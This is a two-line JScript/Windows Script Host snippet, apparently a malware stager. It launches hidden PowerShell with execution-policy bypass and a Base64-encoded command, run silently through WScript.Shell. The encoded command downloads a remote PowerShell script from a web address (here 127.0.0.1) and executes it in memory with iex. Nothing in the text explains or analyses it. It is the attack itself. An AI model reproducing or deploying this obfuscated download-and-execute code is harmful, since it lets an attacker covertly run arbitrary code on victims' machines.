c = "PowerShell -Exec Bypass -NoL -Win Hidden -Enc aQBlAHgAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEALwB3AHcAdwAvAGwAaQBuAGsALwBwAG4AdAAuAHAAcwAxACcAKQApAA==";
r = new ActiveXObject("WScript.Shell").Run(c,0,true);
